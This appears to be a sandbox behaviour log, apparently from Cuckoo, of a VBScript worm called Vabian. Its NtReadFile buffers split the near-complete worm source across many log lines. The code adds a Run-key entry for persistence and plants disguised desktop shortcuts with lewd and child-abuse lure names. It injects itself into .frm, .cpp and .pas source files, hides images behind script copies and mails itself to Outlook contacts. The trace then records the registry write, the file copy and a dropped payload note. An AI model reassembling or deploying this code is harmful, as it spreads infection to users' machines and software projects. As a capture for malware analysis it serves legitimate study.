Buffer => Rem VBS.W32.I-worm.Vabian
Rem Script Project Infector [pas,frm,cpp]
Rem By Psychologic aka Puppy
Rem Mailto : Psychologic@hot FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => mail.com
'sending filename
'x=msgbox(Wscript.ScriptName, 0, "Title")
'malware expires....
date2 = #06/01/2018#
date1 = FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => Date 'get current date
'x = msgBox(date1,0,"sadd")
'x1 = msgBox(date2,0,"sad1")
'x2 = msgBox(diff,0,"diff")
Do while FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => true
If date1 < date2 Then
Exit Do
End If
WScript.Sleep 1000
Loop
On error resume next
Set executor = wscript.Cr FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => eateObject("WScript.Shell")
Set fso = CreateObject("scripting.FileSystemObject")
Set drop = Fso.opentextfile(wscript.scriptful FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => lname, 1)
src = drop.readall
drop.close
executor.regwrite "HKEY_CLASSES_ROOT\VXFile\"
executor.regwrite "HKEY_CLASSES_ROOT FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => \VXFile\DefaultIcon\","C:\PROGRA~1\INTERN~1\iexplore.exe,8"
executor.regwrite "HKEY_CLASSES_ROOT\VXFile\ScriptEngine\","VBScrip FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => t"
executor.regwrite "HKEY_CLASSES_ROOT\VXFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}"
executor.regwrite " FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => HKEY_CLASSES_ROOT\VXFile\Shell\Open\Command\","C:\WINDOWS\WScript.exe " & chr(34) & "%1" & chr(34) & " %*"
executor.regwrite "H FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => KEY_CLASSES_ROOT\VXFile\Shell\Play\Command\","C:\WINDOWS\COMMAND\CScript.exe " & chr(34) & "%1" & chr(34) & " %*"
executor.regw FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => rite "HKEY_CLASSES_ROOT\VXFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}"
executor.regwr FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => ite "HKEY_CLASSES_ROOT\.VX\","VXFile"
executor.regwrite "HKEY_CLASSES_ROOT\VX\CLSID\","{B54F3741-5B07-11cf-A4B0-00AA004A55E8}"
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer =>
executor.regwrite "HKEY_CLASSES_ROOT\VX\OLEScript\"
fso.copyfile wscript.scriptfullname,"C:\windows\backup_vabian.sys"
fso. FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => copyfile wscript.scriptfullname,"C:\windows\Vabian.VX"
if fso.FolderExists("C:\Documents and Settings\All Users\Desktop") the FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => n
on error resume next
set shell=wscript.createobject("wscript.shell")
set msc=shell.CreateShortCut("C:\Documents and Sett FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => ings\All Users\Desktop\Sex-Vabian.jpg.lnk")
msc.TargetPath = Shell.ExpandEnvironmentStrings("%windir%\Vabian.VX")
msc.IconLo FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => cation = Shell.ExpandEnvironmentStrings("C:\windows\system32\mspaint.exe, 0")
msc.WindowStyle = 4
msc.Save
end if
if fso FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => .FolderExists("C:\windows\Desktop") then
on error resume next
set shell=wscript.createobject("wscript.shell")
set msc=shel FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => l.CreateShortCut("C:\windows\Desktop\Sex-Children.jpg.lnk")
msc.TargetPath = Shell.ExpandEnvironmentStrings("%windir%\Vabian.V FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => X")
msc.WindowStyle = 4
msc.Save
end if
set opendroperfrm = fso.OpenTextFile("C:\windows\backup_vabian.sys", 1)
allsour FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => cefrm = ""
oneline = ""
do while opendroperfrm.readline <> "'VabianMarker"
oneline = opendroperfrm.readline
frmformat = FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => replace(oneline,chr(34),chr(34)&"&chr(34)&"&chr(34))
fullline = "? #1," & frmformat
allsourcefrm = allsourcefrm & vbcrlf & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => fullline
loop
opendroperfrm.close
set opendropercpp = fso.OpenTextFile("C:\windows\backup_vabian.sys", 1)
allsourcecpp = FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => ""
oneline1 = ""
do while opendropercpp.readline <> "'VabianMarker"
oneline1 = ""
oneline1 = opendropercpp.readline
oneb FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => yone = len(oneline1)
for i = 1 to onebyone
read34 = mid(oneline1,i,1)
if read34 = chr(34) then
m = ",34"
else
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => m = ""
end if
all = all & m
next
cppformat1 = replace(oneline1,chr(34),"%c")
cppformat = replace(cppformat1,"\","\\" FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => )
fullline1 = "fprintf(mvbswe," & chr(34) & cppformat & "\n" & chr(34) & all & ");"
allsourcecpp = allsourcecpp & vbcrlf & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => fullline1
all = ""
loop
opendropercpp.close
set opendroperpas = fso.OpenTextFile("C:\windows\backup_vabian.sys", 1)
all FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => sourcepas = ""
oneline2 = ""
do while opendroperpas.readline <> "'VabianMarker"
oneline2 = ""
oneline2 = opendroperpas.rea FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => dline
fullline2 = "writeln (mvbswe,'" & oneline2 & "');"
allsourcepas = allsourcepas & vbcrlf & fullline2
loop
opendroper FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => pas.close
winfold = fso.getspecialfolder(0)
backpath = winfold & "\vabian.vbs"
executor.regwrite "HKLM\SOFTWARE\Microsoft FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => \Windows\CurrentVersion\Run\Vabian", "wscript.exe " & backpath & " %"
fso.copyfile wscript.scriptfullname, backpath
ranpay = i FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => nt(rnd * 9)+1
if ranpay > 5 then
set payload = fso.CreateTextFile("C:\payload.txt")
payload.write "VBS.Vabian" & vbcrlf & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => "-------------" & vbcrlf
payload.write "Dear user ... " & vbcrlf & "I just want to tell you something" & vbcrlf
payload.wri FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => te "Your computer has been infected with virus,it called VBS.Vabian" & vbcrlf
payload.write "If you are an Programer, go look FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => at your project check all your frm or cpp or pas files" & vbcrlf
payload.write "Cos that is the victim" & vbcrlf & "Ok I have FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => to go now" & vbcrlf
payload.write "--------------------------------------------------" & vbcrlf
payload.write "Made by Psyc FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => hologic aka Puppy - Indonesian hip-hop singer"
payload.close
executor.run "C:\payload.txt"
end if
Set Drives=fso.drives FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer =>
For Each Drive in Drives
If drive.isready then
FindVictim drive
end If
Next
function FindVictim(path)
on error FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => resume next
Set Folder=fso.getfolder(path)
Set Files = folder.files
For Each File in files
If fso.GetExtensionName(file FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => .path)="frm" then
on error resume next
set readfrmmarker = fso.OpenTextFile(file.path,1, True)
frmmarker = readfrmmarker.r FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => eadline
frmreadall = readfrmmarker.readall
if frmmarker <> "Rem W32.hllp.Vabian" then
set readfrmmarker = fso.CreateTex FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => tFile(file.path, True)
readfrmmarker.write "Rem W32.hllp.Vabian" & vbcrlf & frmreadall & vbcrlf
readfrmmarker.write "Pri FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => vate Sub form_unload(cancel As Integer)" & vbcrlf
readfrmmarker.write "On Error GoTo err:" & vbcrlf
readfrmmarker.write FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => "Open " & chr(34) & "C:\vabian.vbs" & chr(34) & " for output as #1" & vbcrlf
readfrmmarker.write allsourcefrm & vbcrlf & "c FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => lose #1" & vbcrlf & "shell " & chr(34) & "C:\vabian.vbs" & chr(34) & vbcrlf
readfrmmarker.write "msgbox " & chr(34) & "Your FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => Program has been infected by Vabian virus Created by Psychologic" & chr(34) & ",VbInformation," & chr(34) & "W32.VBS.Vabian" & c FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => hr(34)
readfrmmarker.write vbcrlf & "exit sub" & vbcrlf & "err:" & vbcrlf & "End sub" & vbcrlf
readfrmmarker.close
en FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => d if
end if
If fso.GetExtensionName(file.path)="cpp" then
on error resume next
set readcppmarker = fso.OpenTextFile( FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => file.path,1, True)
cppmarker = readcppmarker.readline
cppreadall = readcppmarker.readall
if mid(cppreadall,len(cppreadall FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => ),1) = "}" then
cppreadall1 = replace(cppreadall,mid(cppreadall,len(cppreadall),1),"")
end if
if cppmarker <> "// W3 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => 2.hllp.Vabian" then
set readcppmarker = fso.CreateTextFile(file.path, True)
readcppmarker.write "// W32.hllp.Vabian" & v FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => bcrlf & "FILE *Vabian;" & vbcrlf
readcppmarker.write cppreadall & "wormvabian = fopen("&chr(34)&"vabian.vbs"&chr(34)&","&chr FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => (34)&"wt"&chr(34)&");" & vbcrlf
readcppmarker.write "if(wormvabian)"&vbcrlf&"{"& allsourcecpp &vbcrlf&"}" & vbcrlf
readc FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => ppmarker.write "ShellExecute(NULL, "&chr(34)&"open"&chr(34)&", "&chr(34)&"vabian.vbs"&chr(34)&", NULL, NULL, SW_SHOWNORMAL);" & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => vbcrlf
readcppmarker.write "}" & vbcrlf
readcppmarker.close
end if
end if
If fso.GetExtensionName(file.path)= FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => "pas" then
on error resume next
set readpasmarker = fso.OpenTextFile(file.path,1, True)
pasmarker = readpasmarker.readline FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer =>
pasreadall = readpasmarker.readall
if pasmarker <> "{ W32.hllp.Vabian }" then
set readpasmarker = fso.CreateTextFile(f FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => ile.path, True)
readpasmarker.write "{ W32.hllp.Vabian }" & vbcrlf & pasreadall & vbcrlf
readpasmarker.write "procedure FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => " & "TForm1.FormClose(Sender: TObject; var Action: TCloseAction);" & vbcrlf
readpasmarker.write "begin" & vbcrlf & "AssignFi FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => le (Vabian,'C:\Windows\STARTM~1\programs\startup\Vabian.vbs');" & vbcrlf
readpasmarker.write "Rewrite (Vabian);" & vbcrlf & FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => allsourcepas & vbcrlf & "CloseFile(Vabian);" & vbcrlf
readpasmarker.close
end if
end if
If fso.GetExtensionName(fil FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => e.path)="bmp" or fso.GetExtensionName(file.path)="jpg" or fso.GetExtensionName(file.path)="gif" or fso.GetExtensionName(file.pat FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => h)="ico" then
For i = 1 To 8
fvar = Chr(Int(22 * Rnd) + 97)
varall = fvar & varall
Next
on error resume next
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => bathelp = file.path & ".bat"
Set dropper = Fso.Createtextfile(bathelp, True)
dropper.writeline "Attrib +h " & file.path
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer =>
dropper.Close
executor.run bathelp
fso.Deletefile bathelp
vbscopy = file.path & ".VX"
Set dropper2 = Fso.Createte FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => xtfile(vbscopy, True)
dropper2.write "Set " & varall & " = wscript.CreateObject(" & chr(34) & "WScript.Shell" & chr(34) & ")" FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => & vbcrlf & "Sucke.run " & chr(34) & file.path & chr(34) & vbcrlf
dropper2.write scr
dropper2.Close
end if
next
Se FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => t Subfolders = folder.SubFolders
For Each Subfolder in Subfolders
FindVictim Subfolder.path
Next
end function
Set FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => spreader =CreateObject("Outlook.Application")
Set spreader =spreader.GetNameSpace("MAPI")
For Each C In spreader.AddressLists
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer =>
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.Count
Set spreader=C.AddressEntries(D)
Set spreader=spreader FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => .CreateItem(0)
spreader.To=aaaaaaaa.Address
spreader.Subject="Vabian Milenium"
spreader.Body="Stop asking,just checkout the a FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => ttachment"
spreader.Attachments.Add(Fso.GetSpecialFolder(0)&"\Vabian.vbs")
spreader.DeleteAfterSubmit=True
'//If spreader.To FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => <> "" Then
'//spreader.Send
'//End If
Next
End If
Next
'VabianMarker FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtReadFile |
Buffer => FileHandle => 0x0000020c |
FAILURE | 0xc0000011 | |
| 19:40:26,513 | 252 | FindFirstFileExW |
FileName => C:\WINDOWS |
SUCCESS | 0x001b17c8 | |
| 19:40:26,513 | 252 | RegCreateKeyExA |
Handle => 0x0000020c Access => 2 Registry => 0x80000002 Class => SubKey => SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | RegSetValueExA |
Handle => 0x0000020c Buffer => wscript.exe C:\WINDOWS\vabian.vbs %\x00 ValueName => Vabian Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | RegCloseKey |
Handle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | FindFirstFileExW |
FileName => C:\DOCUME~1\cuckoo\LOCALS~1\Temp\dboardman3_malware2.vbs |
SUCCESS | 0x001b17c8 | |
| 19:40:26,513 | 252 | CopyFileW |
ExistingFileName => C:\DOCUME~1\cuckoo\LOCALS~1\Temp\dboardman3_malware2.vbs NewFileName => C:\WINDOWS\vabian.vbs |
SUCCESS | 0x00000001 | |
| 19:40:26,513 | 252 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000020c FileInformation => |
FAILURE | 0x80000006 | |
| 19:40:26,513 | 252 | NtCreateFile |
ShareAccess => 1 FileName => C:\payload.txt DesiredAccess => 0x40100080 CreateDisposition => 5 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,513 | 252 | NtWriteFile |
Buffer => VBS.Vabian
-------------
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,523 | 252 | NtWriteFile |
Buffer => Dear user ...
I just want to tell you something
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,523 | 252 | NtWriteFile |
Buffer => Your computer has been infected with virus,it called VBS.Vabian
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,523 | 252 | NtWriteFile |
Buffer => If you are an Programer, go look at your project check all your frm or cpp or pas files
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,523 | 252 | NtWriteFile |
Buffer => Cos that is the victim
Ok I have to go now
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,523 | 252 | NtWriteFile |
Buffer => --------------------------------------------------
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,533 | 252 | NtWriteFile |
Buffer => Made by Psychologic aka Puppy - Indonesian hip-hop singer FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,533 | 252 | LdrLoadDll |
Flags => 1305816 BaseAddress => 0x7c9c0000 FileName => shell32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,533 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => ShellExecuteExW FunctionAddress => 0x7ca02f03 ModuleHandle => 0x7c9c0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,573 | 252 | ShellExecuteExW |
Show => 1 Parameters => FilePath => C:\payload.txt |
SUCCESS | 0x00000001 | |
| 19:40:26,573 | 252 | FindFirstFileExW |
FileName => C:\DOCUME~1\cuckoo\LOCALS~1\Temp\* |
SUCCESS | 0x001b08d0 | |
| 19:40:26,573 | 252 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000023c FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\xa6kXc\xec\xd0\x01\x90\x9e\x04?\xac\x9f\xd3\x010\x03\x1a?\xac\x9f\xd3\x010\x03\x1a?\xac\x9f\xd3\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00be runp\x00\x00\x00\x00\x00\x00\x000\x03\x1a?\xac\x9f\xd3\x010\x03\x1a?\xac\x9f\xd3\x010\x03\x1a?\xac\x9f\xd3\x010\x03\x1a?\xac\x9f\xd3\x01\xbf\x00\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x009\x006\x004\x00.\x00i\x00n\x00i\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0\xf6\xfd\x98\xa3\x9f\xd3\x01ps\xfb>\xac\x9f\xd3\x01\xb0\xf6\xfd\x98\xa3\x9f\xd3\x01\xb0\xf6\xfd\x98\xa3\x9f\xd3\x01 |
SUCCESS | 0x00000000 | |
| 19:40:26,573 | 252 | FindFirstFileExW |
FileName => C:\DOCUME~1 |
SUCCESS | 0x001e5030 | 13 times |
| 19:40:26,583 | 252 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000023c FileInformation => |
FAILURE | 0x80000006 | |
| 19:40:26,583 | 252 | FindFirstFileExW |
FileName => C:\DOCUME~1\cuckoo\LOCALS~1\Temp\* |
SUCCESS | 0x001b08d0 | |
| 19:40:26,583 | 252 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000023c FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\xa6kXc\xec\xd0\x01`\x8a\x1b?\xac\x9f\xd3\x010\x03\x1a?\xac\x9f\xd3\x010\x03\x1a?\xac\x9f\xd3\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00be runp\x00\x00\x00\x00\x00\x00\x000\x03\x1a?\xac\x9f\xd3\x010\x03\x1a?\xac\x9f\xd3\x010\x03\x1a?\xac\x9f\xd3\x010\x03\x1a?\xac\x9f\xd3\x01\xbf\x00\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x009\x006\x004\x00.\x00i\x00n\x00i\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0\xf6\xfd\x98\xa3\x9f\xd3\x01ps\xfb>\xac\x9f\xd3\x01\xb0\xf6\xfd\x98\xa3\x9f\xd3\x01\xb0\xf6\xfd\x98\xa3\x9f\xd3\x01 |
SUCCESS | 0x00000000 | |
| 19:40:26,583 | 252 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000023c FileInformation => |
FAILURE | 0x80000006 | |
| 19:40:26,593 | 252 | RegOpenKeyExW |
Handle => 0x0000023c Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,593 | 252 | RegQueryValueExW |
Handle => 0x0000023c Data => ValueName => REGDBVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,593 | 252 | RegCloseKey |
Handle => 0x0000023c |
SUCCESS | 0x00000000 | |
| 19:40:26,593 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000000 SubKey => Outlook.Application |
FAILURE | 0x00000002 | 1 time |
| 19:40:26,593 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Policies\Microsoft\Windows\App Management |
FAILURE | 0x00000002 | |
| 19:40:26,593 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\Windows\App Management |
FAILURE | 0x00000002 | |
| 19:40:26,603 | 252 | RegCloseKey |
Handle => 0x000001be |
SUCCESS | 0x00000000 | |
| 19:40:26,603 | 252 | RegCloseKey |
Handle => 0x000001a2 |
SUCCESS | 0x00000000 | |
| 19:40:26,603 | 252 | RegOpenKeyExW |
Handle => 0x000001a0 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,603 | 252 | RegQueryValueExW |
Handle => 0x000001a0 Data => ValueName => REGDBVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,603 | 252 | RegCloseKey |
Handle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 19:40:26,603 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000000 SubKey => Outlook.Application |
FAILURE | 0x00000002 | 1 time |
| 19:40:26,613 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00001000 BaseAddress => 0x001ab000 |
SUCCESS | 0x00000000 | |
| 19:40:26,613 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00003000 BaseAddress => 0x001b8000 |
SUCCESS | 0x00000000 | |
| 19:40:26,613 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00002000 BaseAddress => 0x001e6000 |
SUCCESS | 0x00000000 | |
| 19:40:26,613 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00002000 BaseAddress => 0x001cf000 |
SUCCESS | 0x00000000 | |
| 19:40:26,623 | 252 | LdrLoadDll |
Flags => 1307652 BaseAddress => 0x7c800000 FileName => kernel32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,623 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetUserDefaultUILanguage FunctionAddress => 0x7c813100 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 19:40:26,623 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00004000 BaseAddress => 0x001d1000 |
SUCCESS | 0x00000000 | |
| 19:40:26,623 | 292 | ExitThread |
ExitCode => 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,633 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x0000e000 BaseAddress => 0x001e8000 |
SUCCESS | 0x00000000 | |
| 19:40:26,633 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00009000 BaseAddress => 0x0019b000 |
SUCCESS | 0x00000000 | |
| 19:40:26,633 | 252 | RegCloseKey |
Handle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x00000166 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x000001a6 |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x000001ba |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x0000019e |
SUCCESS | 0x00000000 | |
| 19:40:26,654 | 252 | RegCloseKey |
Handle => 0x000001c2 |
SUCCESS | 0x00000000 | |
